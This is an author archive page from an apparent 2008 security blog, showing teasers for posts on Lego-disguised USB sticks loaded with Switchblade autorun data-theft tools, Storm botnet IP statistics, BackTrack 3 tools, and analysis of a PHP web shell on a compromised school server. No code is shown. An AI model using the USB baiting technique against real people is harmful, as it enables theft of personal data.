Author Archive for aleksey

Cute + Malicious == Deadly

Published
by
aleksey
on June 28, 2008
in Exploits, Physical Security, Social Engineering, Targeted Attacks and Windows
. Comments

In a recent (experimental only) project, I followed one of the multiple guides such as this one on how to make a Lego case for a USB stick. To top it off, I loaded the Hak5 Switchblade packages on the sticks. When used with U3 USB autorun technology, these packages allow automatic theft of various personal data upon insertion of the stick into a Windows computer. Now, doesn’t this just crush the competition (a regular USB stick lost in the parking lot)?

The Mona Lisa

Continue reading ‘Cute + Malicious == Deadly’

Storm Worm IP List and Country Distribution Statistics

Published
by
aleksey
on May 19, 2008
in Spam and Viruses
. Comments

Due to a recent need for creation of fresh blacklist, we have collected and analyzed 16,000+ unique Storm bot IPs over 2 days. Our results confirm some of the findings of this recent paper regarding size of the Storm botnet. It estimates that the Storm botnet’s size is 5,000 - 6,000 unique IPs (lower bound) and 45,000 - 80,000 upper bound.

The majority of infected machines are located in USA, Russia, Mexico, India, Turkey, Brazil and Poland (in that order). The complete list is here. A partial list of top results is below.

United States 1716
Russian Federation 1177
Mexico 869
India 699
Turkey 609
Continue reading ‘Storm Worm IP List and Country Distribution Statistics’

BackTrack 3: Demos of selected tools

Published
by
aleksey
on April 8, 2008
in Operating Systems and Uncategorized
. 12 Comments

BackTrack 3 (2007-12-14) is a penetration testing live Linux distribution. It is packed with plethora of tools organized by categories.

Bt_menu

With this large amount of utilities, it is sometimes hard to pick the correct one for the job. At Shmoocon 2008, a BackTrack representative gave a talk which was good, but focused on exploiting a Windows binary using Olly, not on showing off the features of the distribution. So I took it upon myself to click on every single link and find the awesome and the less awesome tools among the bunch. Note that the work that I did was for a presentation. There are videos which are self-explanatory but at times need commentary. I will provide some explanation in writing.

Continue reading ‘BackTrack 3: Demos of selected tools’

Reverse Engineering a PHP “Virus”

Published
by
aleksey
on February 23, 2008
in Code, Forensics, Reverse Engineering, Targeted Attacks and Web
. Comments

In a recent incident a school server (not an ISIS server) was compromised. PHP code was injected that listened to and executed commands passed through a POST request with ‘www’ user privileges. Some of the commands that were run include id, pwd as well as directory searches and wgets of various files. The compromised machine also served as a hop in a pharmacy ad delivery scheme. It redirected HTTP requests for medications to a possible ‘mothership’ server. There is evidence that links to our server were posted as ads on websites like MySpace.

sample_ads

Continue reading ‘Reverse Engineering a PHP “Virus”’